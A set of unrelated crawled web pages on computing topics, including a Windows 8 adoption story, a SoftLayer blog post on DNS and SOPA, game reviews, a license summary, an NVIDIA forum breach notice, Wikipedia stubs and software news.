117 comment(s) - last by Moishe.. on Oct 3 at 4:33 PM
(Source: ComputerWorld)
Windows 8 not at popular as Windows 7 so far
Microsoft has a lot riding on Windows 8 operating system. The software giant is hoping that Windows 8 will bring a slew of consumers upgrading from older computers and older versions of its operating system. Microsoft is also betting that Windows 8 will get a strong foothold in the tablet market as well. So far, users are currently five times less likely to be running Windows 8 as they were Windows 7 at the same point before its launch. The new statistics come from research firm Net Applications and indicate a lukewarm reception of the Windows 8 operating system by consumers.
Windows 7 was a follow-up to Windows Vista, which was one of the more maligned versions of Microsoft's operating system in recent years. Windows 7 lured many upgraders not only from Vista, but from the older XP operating system as well. Windows 8 doesn't have the luxury of following an unloved version of Windows like Windows 7.
The statistics offered by Net Applications only count computer users who installed preview versions of Windows 8 and preview versions of Windows 7. The statistics are believed to provide a clear indication of consumer interest in the operating system rather than a desire or need for new computer hardware.
In September, only 0.33% of all computers using Windows relied on Windows 8. That works out to 33 out of every 10,000 Windows machines using Windows 8. By the end of September 2009, with very similar time remaining before the launch of Windows 7, the operating system accounted for 1.64% of all Windows PCs working out to 164 out of every 10,000 units. Analysts are beginning to believe that Microsoft won't see the uptick in OS sales that it hoped for with Windows 8. Gartner recently advised clients that it predicts the operating system would top out at only 20 to 25% share in the corporate environment. Windows 8 went RTM in August and will launch this month.
Source: ComputerWorld Comments Threshold -1
RE: Show me a Win 8 feature that means anything
MrBungle123
Yes, and it made me want to vomit. That interface has no business on anything with a display over 13" or that is not a touch screen...To add to the whole touch thing, its fine on my smart phone, or on a slate, but keep your greasy fingers off my computer monitor. Parent
Interesting, I used it on a notebook connected to a large external monitor and have no issues with it. I use the metro screen as a shortcut for launching programs and could not care less about metro apps, so it works fine for me. Parent
Its too in your face, I could deal with it if it only took up say.. 1/4 of the monitor, at least then I wouldn't feel like I had to give it all my attention... although it has such low information density that it would probably be useless for anything but the search at that size.The fact is that MS is doing what they are doing not because metro is a superior desktop interface (its not) what it is is a way for them to cram their app store down the throats of the windows user base. They are hoping to get a 30% cut of all software sales on PCs and if metro is a big hit Windows 9 will probably have an even more crippled version of the desktop than windows 8. Parent
PC Makers: Windows 8 May Not Be All It's Cracked Up to Be August 21, 2012, 12:17 PM
Windows 8 Hits RTM, Paves Way for October 26 Consumer Launch August 1, 2012, 12:36 PM
Acer Embraces Windows 8 with New Tablets, Ultrabooks, and All-in-Ones June 3, 2012, 11:29 PM | 计算机 |
2015-48/3679/en_head.json.gz/2183 | How the Internet Works (And How SOPA Would Break It) January 12, 2012 Posted by Todd Mitchell in Business, Executive Blog, SoftLayer, Technology Last week, I explained SoftLayer's stance against SOPA and mentioned that SOPA would essentially require service providers like SoftLayer to "break the Internet" in response to reports of "infringing sites." The technical readers in our audience probably acknowledged the point and moved on, but our non-technical readers (and some representatives in Congress) might have gotten a little confused by the references to DNS, domains and IP addresses.
Given how pervasive the Internet is in our daily lives, you shouldn't need to be "a techie" to understand the basics of what makes the Internet work ... And given the significance of the SOPA legislation, you should understand where the bill would "break" the process. Let's take a high level look at how the Internet works, and from there, we can contrast how it would work if SOPA were to pass. The Internet: How Sites Are Delivered
You access a device connected in some way to the Internet. This device can be a cell phone, a computer or even a refrigerator. You are connected to the Internet through an Internet Service Provider (ISP) which recognizes that you will be accessing various sites and services hosted remotely. Your ISP manages a network connected to the other networks around the globe ("inter" "network" ... "Internet").
You enter a domain name or click a URL (for this example, we'll use http://www.softlayer.com since we're biased to that site).
Your ISP will see that you want to access "www.softlayer.com" and will immediately try to find someone/something that knows what "www.softlayer.com" means ... This search is known as an NS (name server) lookup. In this case, it will find that "www.softlayer.com" is associated with several name servers.
The first of these four name servers to respond with additional information about "softlayer.com" will be used. Domains are typically required to be associated with two or three name servers to ensure if one is unreachable, requests for that domain name can be processed by another.
The name server has Domain Name System (DNS) information that maps "www.softlayer.com" to an Internet Protocol (IP) address. When a domain name is purchased and provisioned, the owner will associate that domain name with an authoritative DNS name server, and a DNS record will be created with that name server linking the domain to a specific IP address. Think of DNS as a phone book that translates a name into a phone number for you.
When the IP address you reach sees that you requested "www.softlayer.com," it will find the files/content associated with that request. Multiple domains can be hosted on the same IP address, just as multiple people can live at the same street address and answer the phone. Each IP address only exists in a single place at a given time. (There are some complex network tricks that can negate that statement, but in the interest of simplicity, we'll ignore them.)
When the requested content is located (and generated by other servers if necessary), it is returned to your browser. Depending on what content you are accessing, the response from the server can be very simple or very complex. In some cases, the request will return a single HTML document. In other cases, the content you access may require additional information from other servers (database servers, storage servers, etc.) before the request can be completely fulfilled. In this case, we get HTML code in return.
Your browser takes that code and translates the formatting and content to be displayed on your screen. Often, formatting and styling of pages will be generated from a Cascading Style Sheet (CSS) referenced in the HTML code. The purpose of the style sheet is to streamline a given page's code and consolidate the formatting to be used and referenced by multiple pages of a given website.
The HTML code will reference sources for media that may be hosted on other servers, so the browser will perform the necessary additional requests to get all of the media the website is trying to show. In this case, the most noticeable image that will get pulled is the SoftLayer logo from this location: http://static2.softlayer.com/images/layout/logo.jpg
When the HTML is rendered and the media is loaded, your browser will probably note that it is "Done," and you will have successfully navigated to SoftLayer's homepage.
If SOPA were to pass, the process would look like this:
The Internet: Post-SOPA
You access a device connected in some way to the Internet.
*The Change*
Before your ISP runs an NS lookup, it would have to determine whether the site you're trying to access has been reported as an "infringing site." If http://www.softlayer.com was reported (either legitimately or illegitimately) as an infringing site, your ISP would not process your request, and you'd proceed to an error page. If your ISP can't find any reference to the domain an infringing site, it would start looking for the name server to deliver the IP address.
SOPA would also enforce filtering from all authoritative DNS provider. If an ISP sends a request for an infringing site to the name server for that site, the provider of that name server would be forced to prevent the IP address from being returned.
One additional method of screening domains would happen at the level of the operator of the domain's gTLD. gTLDs (generic top-level domains) are the ".____" at the end of the domain (.com, .net, .biz, etc.). Each gTLD is managed by a large registry organization, and a gTLD's operator would be required to prevent an infringing site's domain from functioning properly.
If the gTLD registry operator, your ISP and the domain's authoritative name server provider agree that the site you're accessing has not been reported as an infringing site, the process would resume the pre-SOPA process.
*Back to the Pre-SOPA Process*
The domain's name server responds.
The domain's IP address is returned.
The IP address is reached to get the content for http://www.softlayer.com.
HTML is returned.
Your browser translates the HTML into a visual format.
External file references from the HTML are returned.
The site is loaded.The proponents of SOPA are basically saying, "It's difficult for us to keep up with and shut down all of the instances of counterfeiting and copyright infringement online, but it would be much easier to target the larger sites/providers 'enabling' users to access that (possible) infringement." Right now, the DMCA process requires a formal copyright complaint to be filed for every instance of infringement, and the providers who are hosting the content on their network are responsible for having that content removed. That's what our abuse team does full-time. It's a relatively complex process, but it's a process that guarantees us the ability to investigate claims for legitimacy and to hear from our customers (who hear from their customers) in response to the claims.
SOPA does not allow for due process to investigate concerns. If a site is reported to be an infringing site, service providers have to do everything in their power to prevent users from getting there.
-@toddmitchell
Permalink bughunter Says: January 12th, 2012 at 7:29pm I'm trying to reconcile "Before your ISP runs an NS lookup, it would have to determine whether the site you’re trying to access has been reported as an “infringing site.” If [so, then] your ISP would not process your request."
And "If a site is reported to be an infringing site, service providers have to do everything in their power to prevent users from getting there."
With the Post-SOPA URL request/ Page retrieval process you describe, all an individual who wanted to visit the infringing Softlayer.com site would need to do is enter the raw IP address, bypassing the DNS retrieval step.
But "everything in their power" could be construed to mean something as complicated as detecting the entry of an IP adress (instead of a URL) and then using a reverse DNS to determine that the user was attempting to reach an infringing site, and blocking the subsequent... or something as simple as doing a periodic DNS lookup of each infringing site on record and blocking all packets originating from those IPs.
Of course, even those methods can be bypassed, and the effect would likely be to create a black market for the workarounds themselves, either as client software or remote services like VPN or even IP reverse-spoofing...
All in all it's a farce, and will do nothing but cost governments and ISPs money.
Permalink khazard Says: January 13th, 2012 at 9:02am Those are great points, bughunter, and they are consistent with why we believe the bill would be inefficient when it comes to enforcement. DNS works because everyone agrees that DNS works. If ISPs are required to police DNS, people intent on going to infringing sites will circumvent it, and ultimately DNS won't work because people won't agree that DNS works any more.
Given the finite resource of IPv4 space, more and more sites will share single IPv4 addresses, making it impossible to take blanket action on a single IP (considering the collateral damage it would cause to hundreds - if not thousands - of legitimate sites).
The hurdles that are being put up for "infringing site" owners and users are just hurdles, not security fences. The biggest worry is that the bad guys will (relatively easily) find a way to circumvent the actions required by the bill, and the only people affected will be good guys who fall victim to bad guys who take advantage of the legislation and use it to their own gain.
Permalink James Hanna Says: January 13th, 2012 at 10:03pm I'm proud of SoftLayer taking a stand against SOPA.
Don't let politicians that know nothing about how the internet works break it. They dont understand how much of an impact it would be for the hosting business in the US.
Keep up the fight never give up.
Permalink Chris Alonzo Says: January 14th, 2012 at 8:29am Finally a good explanation of why SOPA won't work. Thanks Kevin!
Permalink Pixy Misa Says: January 14th, 2012 at 8:45pm Todd, thanks for these posts on SOPA.
As a software developer and writer I certainly understand the need to protect intellectual property rights, but the means by which we do so has to be balanced against effectiveness, cost, and fundamental human rights.
Kevin has it exactly right: DNS works by mutual consent. Any attempts to enforce changes without that consent risk causing the collapse of the system. Notably, there are *already* browser plugins available that will circumvent the SOPA measures. SOPA will not be effective, and is likely to cause considerable collateral damage. It's bad legislation from every angle.
Permalink Daniel Says: January 20th, 2012 at 3:29pm Thank you for taking the right side in this big problem. I am not from America but I will try to keep my severs in this great hosting unless America turns into a digital hell. If America accepts SOPA then some of persons, maybe... a few hundreds of persons? ... would get even richer and happy because we would be forced to pay them, right, great! Yes, that is good for ... 0,000001% of the world... and bad for the other 99,99999%. Mmmmm... I think it is not a good deal.
Permalink Arabvps.net Says: January 22nd, 2012 at 8:18am thanks for these posts on SOPA. SOPA won’t work. :)
Categories: businessexecutive-blogsoftlayertechnologyKeywords: abusebusinesscongresscopyrightdnsgovernmenthostinginfringementintellectual-propertyinternetip-addresseslawslegislationname-serverpipapiracysoftlayersopatechnology Keywords: Abuse, Business, Congress, Copyright, DNS, Government, Hosting, Infringement, Intellectual Property, Internet, Ip Addresses, Laws, Legislation, Name Server, Pipa, Piracy, Softlayer, Sopa, Technology Categories: Business | Executive Blog | SoftLayer | Technology Add new comment | 计算机 |
2015-48/3679/en_head.json.gz/2205 | A Gnome's Ponderings
I'm a gamer. I love me some games and I like to ramble about games and gaming. So, more than anything else, this blog is a place for me to keep track of my ramblings.
If anyone finds this helpful or even (good heavens) insightful, so much the better.
6 Breaking in a new gaming table
Posted by Lowell Kempf
Lowell Kempf
(Gnomekin)
On Friday, Carrie and I visited a friend who had just moved back to Chicago. It wasn't quite a house-warming visit but it was a chance to see his new place and to play some games.As I've mentioned before, Right Games in Russia sent me some games for review to help get out the word that they were publishing games in English.We tried out Potion Making: Practice for the first time. It has been said to be one of the most popular games in Russia but that was more of a warning signal for me. After all, one could argue that Munchkin is one of the most popular games in the U.S. and I would rather watch a Twilight movei marathon than be forced to play Munchkin.Much to my delight (and a bit to my surprise), Potion Making was actually a lot of fun. The basic idea of the game is that all of the cards are both formulas and ingredients. If cards are on the table, they are ingredients. If they are in your hand, they are formulas. You can either add a card to the table, adding to the available ingredients on hand, or complete a formula using the ingredients from the table to make a potions. One twist is some of the completed potions are ingredients in more complex formulas and you can use other people's completed potions to make more complex potions.Now, the game is a light one. It is very information heavy game in the sense that every card is a formula and an ingredient. However, with the exception of a few special spell cards, all the cards interact in the same way. And there's also no real way that you have conflict, except by gaffling an ingredient before someone else can use it.However, the theme is very imersive. The mechanics of the game and the idea of the game join together very well. What's it about? Making potions. What do you do? Mix ingredients together. And the artwork on the card is beautiful and really brings out the theme. It isn't the next Agricola but it is a very pleasant social game.One thing we wished we had was a mat that showed all sixteen ingredients so we could track what was on the table easier.After that, we played The Enigma of Leonardo, a game we had already tried as a two-player game. However, I really wanted to see how it would work as a multi-player game.Each player has a cross of cards and you are trying to match three symbols in a row in your cross, earning a token of that symbol. The game is a race to get seven tokens. You play a card from your hand to replace a card on your cross. However, the card you replace goes onto the next player's cross, replacing the card in the same position. Their old card gets discarded.The cards are illustrated with pictures from Di Vinci's notebooks and are quite pretty. That said, they really don't play any real part in the mechanics of the game. When you get down to it, the game is completely abstract and they could have themed it with circuits or coins or just abstract symbols.However, the gameplay is solid. I have never played a game with mechanics quite like it and they really do work. And, since you are messing with another player's stuff, it is a game that you can play nasty if you want to. We agreed that it was a solid and fun game.The week before, I had played Gheos for the first time and I wanted to play it again. My first games of Gheos had been very tight, very nasty games where we cut up and destroyed each other's cultures almost constantly. This time, we were a hair less aggressive (at least at first) and continents actually got built up.What I realized this meant was that when you break up a larger continent, you can end up with an empty continent with more than one wheat symbol on it. With this in mind, we were suddenly able to start cornering whole cultures in a move. We didn't get to keep them, of course. Still, it opened up new ways for the game to work in my eyes.We wrapped up with him showing us his i-pad and how it could be used as a game system. We played Small World, which goes really fast when all the house-keeping is done for you. It was neat but I just can't justify getting one just to play games.
Gheos
Potion-Making: Practice
The Enigma of Leonardo
Rightgames LLC
Subscribe Sun Sep 4, 2011 7:14 pm | 计算机 |
2015-48/3679/en_head.json.gz/2274 | — CC BY-NC-ND 2.5 IT
Attribution-NonCommercial-NoDerivs 2.5 Italy
(CC BY-NC-ND 2.5 IT)
You are free to:
Share — copy and redistribute the material in any medium or format
The licensor cannot revoke these freedoms as long as you follow the license terms.
Under the following terms:
Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
Non-Commercial — You may not use the material for commercial purposes.
NoDerivatives — If you remix, transform, or build upon the material, you may not distribute the modified material.
No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.
Notices:
You do not have to comply with the license for elements of the material in the public domain or where your use is permitted by an applicable exception or limitation.
No warranties are given. The license may not give you all of the permissions necessary for your intended use. For example, other rights such as publicity, privacy, or moral rights may limit how you use the material.
The applicable mediation rules will be designated in the copyright notice published with the work, or if none then in the request for mediation. Unless otherwise designated in a copyright notice attached to the work, the UNCITRAL Arbitration Rules apply to any arbitration.
If supplied, you must provide the name of the creator and attribution parties, a copyright notice, a license notice, a disclaimer notice, and a link to the material. CC licenses prior to Version 4.0 also require you to provide the title of the material if supplied, and may have other slight differences.
In 4.0, you must indicate if you modified the material and retain an indication of previous modifications. In 3.0 and earlier license versions, the indication of changes is only required if you create a derivative.
Marking guide.
You may also use a license listed as compatible at https://creativecommons.org/compatiblelicenses
A commercial use is one primarily intended for commercial advantage or monetary compensation.
Merely changing the format never creates a derivative.
The license prohibits application of effective technological measures, defined with reference to Article 11 of the WIPO Copyright Treaty.
The rights of users under exceptions and limitations, such as fair use and fair dealing, are not affected by the CC licenses.
You may need to get additional permissions before using the material as you intend. | 计算机 |
2015-48/3679/en_head.json.gz/2345 | The keyboard needs to be retired.
blognorg Roseburg, ORPosts: 643Member July 2012 in Hardware It's kind of funny how an interface device that was used for gaming out of necessity has become the norm. You'd think that at this point something better would have become the standard for PC gaming. It's an awkward, carpal tunnel-inducing nightmare. I'm looking forward to the GW2 release, and I think it's cool that they're incorporating some varied gameplay mechanics like jumping puzzles, but it's going to be horrible because of the keyboard. There's a reason why analogs have become the standard for consoles, because they are vastly superior to the four-button setup. Hell, people complain about how imprecise analogs are compared to a mouse, but that pales in comparison to a keyboard's movement in my opinion. I bought a Razer Nostromo a while back, and it's a little better, but it still suffers form only eight directions and no variance of magnitude. The worst part is that I don't even have the option for an analog at this point; they are so nonstandard that even if I wanted to use one, no MMO would support it. Hopefully, as the MMO market keeps expanding, analogs will be a new standard, and that way we'll all still be able to open pickle jars when we're sixty, and things like action combat can be more than a lofty gimmick. EDIT: To clarify, this isn't a K&B vs controller thread. This has more to do with the keyboard not being designed around gaming, and I'm a little sad that we haven't come up with a better stadard. My reasons were ergonomics and limited movement scope. My gripe doesn't have nything to do with controllers, other than the fact that contollers use analog for movement. 0 «1234» Go
Comments SaintGraye Los Angeles, CAPosts: 109Member Uncommon July 2012 No....typically I'd say more, but that effectively sums up my thoughts on the matter. Well, that and "long live WASD!" 0 FredomSekerZ | 计算机 |
2015-48/3679/en_head.json.gz/2677 | Activision Blizzard says Call of Duty: Ghosts will be a huge launch, but stock falls on weak Warcraft numbers
Dean Takahashi May 8, 2013 2:54 PM
Tags: Activision Blizzard, Blizzard Entertainment, Bobby Kotick, Call of Duty, Eric Hirshberg, featured, game news, Mike Morhaime, Skylanders, World of Warcraft Activision Blizzard chief executive Bobby Kotick warned that the industry’s leading video game publisher will face serious competition and possible industry headwinds in the holiday selling season. At the same time, he raised estimates for the company’s financial performance this year based on an outstanding first quarter.
The mixed outlook suggests that the game business is at a more uncertain time now than it has been in years. The industry is in a transition year for consoles, and competition from smartphones and tablets is bigger than ever. At every turn, Activision Blizzard faces more competition. This outlook is different compared to the company’s last comments in February, and it means that Activision will have to spend more on marketing and advertising to hang on to its customers this fall.
Activision plans a major new launch of its Call of Duty: Ghosts first-person military shooter Nov. 5, with a bigger sales and marketing campaign than ever before for a blockbuster Call of Duty game. But the title will face competition from the likes of Electronic Arts upcoming Battlefield 4 and other titles coming for the next-generation consoles.
In a call with analysts today, Kotick didn’t name his competitors, but he said that the weakness of Nintendo’s Wii U game console and the coming competition in the second half is making Activision Blizzard extra cautious about predicting good results. A new version of Activision’s Skylanders is coming this fall. That game, Skylanders: Swap Force, features toys with top and bottom halves. Players can swap those halves to form new creatures for use in the video game. But Skylanders will face huge competition starting in August from Disney Infinity, another game-toy hybrid entertainment product.
Skylanders, another billion-dollar franchise launched just two years ago, is now the No. 1 game franchise of the year, said Eric Hirshberg, CEO of Activision Publishing. That makes it bigger than the No. 2 Call of Duty: Black Ops II in the U.S. and Europe. He said Skylanders was doing well despite the weakness of Nintendo’s Wii and Wii U.
The company is still the healthiest firm in the video game business, with more than $4.6 billion in cash. Its business is driven by major franchises, including Call of Duty, World of Warcraft, Skylanders, and PC games such as StarCraft II: Heart of the Swarm. These have helped make the company into the largest publisher of video games, and it has been making more money than rivals such as EA.
But gaming’s No. 1 publisher warned that risks in the second half of 2013 are “more challenging than our earlier view.”
Activision made no mention of major new franchises in the works, such as Blizzard’s new massively multiplayer online game, code-named Titan. But the pressure to launch that game is building.
Kotick said that while World of Warcraft remains the No. 1 fantasy online role-playing game, it lost 1.3 million subscribers in the quarter, leaving the game with 8.3 million players. The company expects that number to fall further by the end of the year. In recognition of competition from free-to-play games, the company is figuring out how to launch updates more frequently. But it does not have big update, like last year’s World of Warcraft: Mists of Pandaria, on the way.
In after-hours trading, Activision Blizzard’s stock price fell 5 percent to $14.49 a share. The fall may be due to the drop in World of Warcraft numbers and the comments about the second half.
“I think WoW numbers are a bigger deal,” said analyst Michael Pachter at Wedbush Securities in an email. “They are not telling us anything we didn’t know before about competition or weak Wii U sales. The surprise is the sequential drop off in WoW subscribers.”
Mike Morhaime, the head of the Blizzard Entertainment division, said in the conference call that his company is working on its first cross-platform free-to-play game, Hearthstone: Heroes of Warcraft, for the PC, Mac, and iPad. Blizzard’s revenue was up due to sales of StarCraft II: Heart of the Swarm, which sold 1.1 million copies in its first two days. But Blizzard saw a decline in Asian subscribers for World of Warcraft. He said the company will launch new game content at a quicker pace to improve engagement. StarCraft II content is now viewable on Korean TV five days a week (as the Koreans are game fanatics and have a special love for StarCraft).
Morhaime said the company is also working to modify Diablo III so that it will ship on the PlayStation 3 console. BlizzCon is coming to the Anaheim Convention Center in November, and tickets sold out in a matter of minutes. He said the company continues to work on Blizzard All-Stars and the unannounced MMO.
“Regardless of the near-term volatility in the industry, our focus and our disciplined approach to our business, which has served us well in the past, will enable us to continue delivering shareholder value in the long term, as we have for the last 20 years,” Kotick said.
Hirshberg said on the call that Call of Duty: Ghosts is coming Nov. 5. He said that Activision is showing Ghosts at Microsoft’s May 21 event for the debut of the next-generation Xbox in Seattle. Ghosts will have a new story and new characters as well as the biggest sales and marketing campaign ever for a Call of Duty game. That’s saying a lot, since Activision Blizzard makes a lot of noise about Call of Duty every year. Kotick said he would not predict a dramatic shift in the business models for the next-generation game consoles, but he said, “We approach new businsses skeptically.”
Hirshberg said that the current Call of Duty: Black Ops II saw first quarter usage and engagement that was higher than a year ago. The company has launched another map pack, dubbed Uprising, to keep players engaged. Sales for Black Ops II are higher than Call of Duty: Modern Warfare 3 from the year before. Hirshberg said that Call of Duty’s new business model of selling microtransactions, such as a bacon-wrapped decoration for a gun, is also doing well.
“We introduced an all new business model of selling micro DLC (downloadable content),” he said. “It delivers extra value for our fans but in no way compromises game play.”
For the year, Activision Blizzard expects non-GAAP revenue of $4.25 billion for the year and earnings per share of 82 cents. | 计算机 |
2015-48/3679/en_head.json.gz/3199 | NVIDIA Forums suspended after hack
In the wake of recent security breaches at Phandroid's Android Forums, Yahoo!, Formspring and others, NVIDIA has now announced that it has suspended operations of its forums site following the discovery of "suspicious activity". The technology company says that it took the site down last week to investigate intrusions into its systems by unauthorised third parties.
The intruders reportedly gained access to private user data, including usernames, email addresses, and hashed passwords with random salt values. Data in users' "About Me" profiles, such as age, birthdate, gender and location, was also accessed in the breach; however, this information was already publicly accessible on the site.
In its security notice, NVIDIA notes that it is currently "employing additional security measures to minimize the impact of future attacks", adding that it hopes to restore the Forums as soon as possible. Once restored, the company says that it will reset all user passwords and send an email to users with a temporary password and instructions on how to change it. NVIDIA Forums users that re-use the same password on multiple sites are advised to change them as soon as possible. (crve) | 计算机 |
2015-48/3679/en_head.json.gz/3970 | CKS Group
This article relies largely or entirely upon a single source. Relevant discussion may be found on the talk page. Please help improve this article by introducing citations to additional sources. (June 2011)
CKS Group was an advertising agency based in Cupertino, California, catering to technology companies. The initials CKS came from the three name partners, Bill Cleary, Mark Kvamme, and Tom Suiter. All three had previously worked for Apple Computer. The company went public in 1995 and merged with USWeb in 1998.
The origins of the company went back to Cleary Communications, a business venture started by Cleary in 1987. Kvamme bought into the venture in 1989, and the CKS name was adopted in 1991 after Suiter joined the other two.
Due to its origins, the company had a natural expertise with interface design and other technical matters that distinguished it from traditional advertising agencies. It also had a ready-made client base, with Apple as one of its major customers. CKS bought a video production studio from Apple and at one point contemplated putting together a cable television channel with Ziff-Davis Publishing. The studio was to be used to create infome | 计算机 |
2015-48/3679/en_head.json.gz/3990 | WWIV
This article is about the bulletin board software. For the concept of future world wars, see World war#Later. For the 2003 film, see The Fourth World War.
This article does not cite any references (sources). Please help improve this article by adding citations to reliable sources. Unsourced material may be challenged and removed. (May 2009)
This article possibly contains original research. Please improve it by verifying the claims made and adding inline citations. Statements consisting only of original research should be removed. (December 2010)
WWIV was a popular brand of bulletin board system software from the late 1980s through the mid-1990s. The modifiable source code allowed a sysop to customize the main BBS program for their particular needs and aesthetics. WWIV also allowed tens of thousands of BBSes to link together, forming a worldwide proprietary computer network, the WWIVnet, similar to FidoNet, but with fewer problems[clarification needed][citation needed] related to forum management.
2 The switch To C++
3 The rise of WWIVnet
4 Gateways to non-WWIV computer networks
5 WWIV vs Fido: controversies and BBS wars
6 Influences
WWIV started out in early 1984 as a single BBS in Los Angeles, California, run by Wayne Bell, who wrote the original 1.0 version in BASIC as a high school programing project, and shared the software with 25 of his friends.
As the popularity of WWIV spread in the mid-1980s, for practical reasons Bell switched to Pascal — specifically Borland's Turbo Pascal 2.0 — creating a compiled version of the BBS but distributing the source code for it to anyone who was interested in their own BBS. This encouraged sysops to develop new features for WWIV, and these ideas were released as "mods" that others cou | 计算机 |
2015-48/3679/en_head.json.gz/4179 | 64-bit Final Cut Pro X now in Mac App Store, reaction is mixed
Apple has released major updates to Final Cut Pro, Motion, and Compressor for …
Image by Apple Inc.
Apple first made public mention of the major overhaul to its Final Cut Pro editing software in April, and on Tuesday, the company announced immediate availability of Final Cut Pro X via the Mac App Store. With full 64-bit, multi-core support and performance, along with a radical new editing timeline, Final Cut Pro X charts a bold new direction for editing. However, not all video editors will be on board with the changes.
A major improvement to Final Cut Pro X, along with its companion Motion 5 and Compressor 4 apps, is a complete rewrite to take advantage of all the power of modern Macs and Mac OS X. This includes across-the-board 64-bit support, OpenCL and Grand Central Dispatch support, and full ColorSync managed, 4K resolution-independent workflow. It brings major performance improvements, including background processing of rendering, effects, and imports, as well as the ability to fully utilize all CPU and GPU resources in any given machine.
That power comes along with a major change in the user interface, though. Borrowing ideas from the latest versions of iMovie, FCPX now sports a new "Magnetic Timeline." Clips can be easily inserted and rearranged as needed, without worrying about audio sync and other issues. Clips can also be linked with alternate views and takes, audio, and other effects to create a Compound Clip. These grouped clips can also be re-arranged at will without concern for sync or other issues. Supplementing the Magnetic Timeline is a context-sensitive Precision Editor for making fine-grained cuts and trims.
While experienced video editors might find the changes jarring at first, the new timeline promises improved editing speed. "I use the analogy of a bike versus a motorcycle," Larry Jordan, an editor who specializes in Final Cut Pro training, told Ars. "Both have handlebars and two wheels, but there is a whole lot of different in function and performance. The magnetic timeline is amazing, and the precision editor provides a trimming view we've never seen before," he said.
FCPX also includes new features for importing, managing, and using clips. When importing, the content is automatically analyzed for shot angles, faces, and the number of people in shots. This data is then used to organize clips into Smart Groups such as "wide" or "close-up" shots, or the program can show you all the clips with a particular person in them. Additional tagging options make it easy to organize clips and find them quickly while deep in the editing process.
"Final Cut Pro X is the biggest advance in Pro video editing since the original Final Cut Pro," Apple's senior vice president of Worldwide Product Marketing, Phil Schiller, said in a statement. "We have shown it to many of the world's best Pro editors, and their jaws have dropped."
Their jaws may have dropped, but that doesn't mean all editors will welcome the changes with open arms. The radical changes in the timeline will represent a steep learning curve for those accustomed to traditional non-linear editing.
"I think it is a bold move—I can't think of any other company that could pull it off," said Jordan, who had access to early betas of the software for the last few months. "However, I think it is also very polarizing. Dyed-in-the-wool editors are going to be very unhappy."
But Final Cut Pro X includes so many improvements, according to Jordan, that it will be worthwhile for editors to buy the software and start learning the new interface. "My key point is that each editor has different needs, and Final Cut Pro X is a tool to help meet those needs," he said. "If it works for you and your media and your workflow, upgrade. If not, then wait a bit. The world will not end if you continue editing on FCP 7 for a while longer!"
Final Cut Pro X includes built-in color grading tools.
Even with the improved editing and performance, though, there will be some pain. Long-time Final Cut Pro users will quickly note that major applications included in the previous Final Cut Studio, including Color, Soundtrack Pro, and DVD Studio Pro are no longer available. Final Cut Pro X includes vastly improved audio and color editing, which spokesperson Colin Smith suggested supersede the need for separate Soundtrack Pro and Color applications. And from Apple's point of view, DVD Studio Pro is a vestigial appendage that is no longer necessary in the era of streaming online video.
Jordan doesn't entirely agree with Apple's assessment of the industry, though. The new color editing and grading tools, including what Jordan calls "power windows," may replace Color for most users. But, while the built-in audio editing, processing, and effects are top notch, Final Cut Pro X just isn't capable of multi-track audio recording. Also, Jordan said, "the inability to apply effects, volume, and pan settings to a track is a huge omission."
And while Final Cut Pro—along with Compressor 4—excels at delivering video for distribution via the Web, the industry still relies on discs for delivery and sales. "Apple is fixated on downloads," Jordan told Ars. "However, the world of media is using DVDs and Blu-ray to make money. I am personally very disappointed that Apple did not continue DVD Studio Pro."
For users who still need to deliver projects on disc, they will have to use the existing version of DVD Studio Pro or consider Adobe Encore.
Most vexing for some pro users, however, is the lack of tape control for import and export. While Final Cut Pro X has some capacity to import from tape, there is no ability to control output to tape. Final Cut Pro X is largely built on the assumption that footage is captured digitally and output directly to some digital form. Editors that work in the broadcasting industry in particular, where tape is still regularly used, may not be able to work with these limitations. Again, the ability to install FCPX while still holding on to and using FCP7 will be advantageous here.
Putting aside the technical issues, though, Jordan offers editors one last bit of advice. "Don't lose sight of the fact that we are not in the software business," he said. "We are in the story-telling business."
Final Cut Pro X is available now via the Mac App Store for $299.99. Motion 5 and Compressor 4 are also available now via the Mac App Store for $49.99 each. | 计算机 |
2015-48/3679/en_head.json.gz/4181 | “Protestors” call games industry a “temple of sin,” demand repentance
A pair of "protesters" outside the Game Developers Conference helped draw …
what they see as the sins of the video game indPhotograph by Kyle Orland
Between all the scheduled panels, meetings, and game demonstrations, covering a gathering like the Game Developers Conference can sometimes feel a bit too predictable. Thank God, then, for scenes like the one above, in which two "protesters" threw a bit of unpredictability into the proceedings by noisily decrying a focus on marketing and monetization that they say is holding the game industry back.
Johannes Grenzfurther, the guy holding the "God Hates Game Designers" sign seen above, is no stranger to "autonomous actions" like the impromptu protest he held in front of San Francisco's Moscone Center this week. As the founder of international art group monochrom, he's helped organize "context hacking" happenings that have involved everything from building cocktail robots to sending scanned scrotum pictures to various politicians (no, it's not safe for work).
Fellow protestor Adam Flynn said he's worked on noncommercial games in the past and follows the industry closely. He wanted to take advantage of the conference "opportunistically" to promote the idea that gamers should be seen as the audience for artistic works, rather than as monetizable customers to exploit.
"When you start to treat someone like a bundle of revenue rather than as a humane and natural and vital end unto themselves, it leads to a sort of cheapening of human relations," Flynn told Ars Technica. While commerce has always been a part of video games, Flynn says the free-to-play model is especially harmful to the idea of games as meaningful experiences.
"At least when there was an initial transaction, the relationship afterwards was to provide fun," he said. "Now, the notion of games as a service leads to an ongoing sales pitch. Anyone who's ever dealt with a door-to-door salesman has realized that relating with that person in a deep or human manner is relatively hard to come by, and there is a certain feeling of the relations with the other person being reduced to a mechanistic sense."
Flynn was unsympathetic to the suggestion that providing games as an ongoing service means that developers need to make sure the player continues to have fun well after the initial purchase.
"If you reduce fun to a set of mechanisms reminiscent of a rat in a cage hitting a lever to get a pellet, I think that reduces something rich and vital about the human experience," he said. Now is the time to discuss these issues, he added, as the first few decades of a medium's development can affect the way it progresses well into the future.
Bemused GDC attendees stop to take pictures of the protestors, who insulted the attendees' chosen profession continuously throughout.Kyle Orland
Grenzfurther insisted that the pair's protest wasn't subtle viral marketing for some product or another—an important point to clarify on a street corner where paid spokespeople were handing out samples for everything from Magicka to Nos energy drink. Not that loud cries calling the conference a "temple of sin" and demanding that attendees kneel on the ground seeking repentance could be easily mistaken for marketing message in the first place.
"Look at all those sad faces, coming from your sad game challenges," Grenzfurther cried to a bemused crowd that stopped to take pictures. "There is time to turn around. There is time to stop that way of living. ... You don't want to be John Romero! Take your badges and throw them on the ground!" | 计算机 |
